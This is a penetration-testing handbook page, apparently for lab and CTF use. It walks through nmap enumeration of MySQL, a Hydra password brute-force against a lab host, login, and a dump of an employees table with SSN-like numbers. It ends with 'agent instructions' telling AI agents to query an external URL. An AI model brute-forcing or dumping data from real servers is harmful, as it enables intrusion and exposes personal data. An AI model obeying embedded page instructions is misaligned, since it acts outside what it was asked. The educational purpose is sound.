# MySQL
MySQL is one of the most popular open-source relational database management systems (RDBMS). It is used by websites, applications, and services to store and manage structured data such as user accounts, orders, logs, personal information, etc.
{% hint style="info" %}
MySQL is often paired with web servers (like Apache/Nginx) in a stack (e.g., LAMP, LEMP) and runs on port `3306` by default.
{% endhint %}
## Why Would a MySQL Server Be Accessible Over the Network?
Typically, **MySQL servers are meant to be accessed only locally** (from `localhost`) or from trusted IPs (like a backend webserver).
However, due to misconfigurations or neglect:
* It may be **exposed to the internet**.
* It may be **accessible from any IP (`0.0.0.0`)**.
* Weak **authentication policies** may be in place.
* And in many cases, **sensitive data is not encrypted** inside databases.
***
## Enumeration
Let’s say we found a host and want to see if MySQL is running. We use `nmap` to enumerate:
❯ nmap enumlikeapro.nca -T4 -sCV -p 3306
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 8.0.42-0ubuntu0.22.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.42_Auto_Generated_Server_Certificate
| Not valid before: 2025-05-23T17:06:45
|_Not valid after: 2035-05-21T17:06:45
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.42-0ubuntu0.22.04.1
| Thread ID: 14
| Capabilities flags: 65535
| Some Capabilities: Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolOld, FoundRows, InteractiveClient, LongPassword, SwitchToSSLAfterHandshake, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Support41Auth, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: \x0Fy\x08"PAjGZMv_R\x14%Ylj]+
|_ Auth Plugin Name: caching_sha2_password
{% hint style="info" %}
This shows MySQL is running on port `3306`, using `caching_sha2_password` for authentication — default in MySQL 8.0.
{% endhint %}
### Why Is This a Problem?
If a MySQL server is exposed and:
* Uses **weak credentials**
* Allows **remote login**
* Contains **PII (personally identifiable information)**, **user accounts**, **financial records**, or even **API keys**
Then an attacker can:
* Dump all data
* Exfiltrate internal secrets
* Potentially find credentials reused for other services like **SSH, web apps, or email**
This is a **massive breach risk**.
## Bruteforcing with Hydra
We can use Hydra to bruteforce MySQL credentials if we suspect usernames and weak passwords:
❯ hydra -l anil -P EnumLikeAPro/passwords.txt mysql://enumlikeapro.nca -t 32
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-23 23:13:01
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 52 login tries (l:1/p:52), ~13 tries per task
[DATA] attacking mysql://enumlikeapro.nca:3306/
[3306][mysql] host: enumlikeapro.nca login: anil password: REDACTED_PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-23 23:13:02
If credentials are guessed or found:
```bash
❯ mysql -h enumlikeapro.nca -u anil -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 252
Server version: 8.0.42-0ubuntu0.22.04.1 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
```
Once logged in, we can we can start enumerating the databases.
To list the databases in this mysql instance we can use following command:
```bash
mysql> show databases;l
+--------------------+
| Database |
+--------------------+
| employee_data |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
```
We can see 3 databases available here, out of them `information_schema` and `performance_schema` are default mysql databases which stores mysql informations. But `employee_data` is non-standard meaning it should be created by someone.
We can choose `employee_data` database like so:
```bash
mysql> use employee_data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
```
And we can now list tables in this database like so:
```bash
mysql> show tables;
+-------------------------+
| Tables_in_employee_data |
+-------------------------+
| archive_2020 |
| employees |
+-------------------------+
2 rows in set (0.00 sec)
```
We can find two tables here. Let's write a SQL Query to list all contents from `employees` tables:
```bash
mysql> select * from employees;
+-----+---------------------+-------------+-------------------------------------+------------+--------+-------------+
| id | full_name | department | email | phone | salary | ssn |
+-----+---------------------+-------------+-------------------------------------+------------+--------+-------------+
| 1 | Steven Jones | Sales | whill@jones.com | 0962287394 | 74295 | 256-77-0221 |
| 2 | Michael Martin | Engineering | lduncan@gmail.com | 6651673378 | 58878 | 609-57-3225 |
| 3 | Rebekah Williams | Legal | keithchurch@gmail.com | 5410395848 | 77069 | 107-20-6423 |
| 4 | Craig Lewis | Sales | ehoover@yahoo.com | 7742157975 | 125740 | 745-52-0685 |
| 5 | Katie Watson | Engineering | william06@simmons.com | 8964647675 | 104014 | 093-05-2943 |
..SNIP..
```
We can also query the colums of our interest like so:
```bash
mysql> select id,full_name from employees;
+-----+---------------------+
| id | full_name |
+-----+---------------------+
| 1 | Steven Jones |
| 2 | Michael Martin |
| 3 | Rebekah Williams |
| 4 | Craig Lewis |
| 5 | Katie Watson |
| 6 | Aaron Blake |
..SNIP..
```
## Realistic Credential Sources
In real-world scenarios, credentials may be:
* Found in **config files** on a compromised system
* Reused from **FTP, SSH, or web panel**
* Leaked in **backups**, **source code**, or **logs**
> In our lab, the same user (`anil`) had access to **MySQL**, demonstrating how **credential reuse increases risk**.
## Want to Learn SQL?
Once you gain access to a MySQL database, knowing **how to use SQL** becomes very important. You’ll need to know how to:
* View databases and tables
* Extract information from columns
* Search for sensitive data
* Dump flags or credentials
If you're not already familiar with SQL queries, this is the perfect time to learn them.
You can learn more about SQL queries from here:
*
*
*
These sites will teach you:
* `SELECT`, `WHERE`, `LIKE`, `LIMIT`, `ORDER BY`
* `JOIN`s
* `INFORMATION_SCHEMA` usage
* and more advanced database techniques
{% hint style="info" %}
As a pentester or CTF player, being fluent in SQL is extremely valuable — both for exploitation and for understanding how systems store and manage data.
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://handbook.ncateam.xyz/reconnaissance/services-enumeration/mysql.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.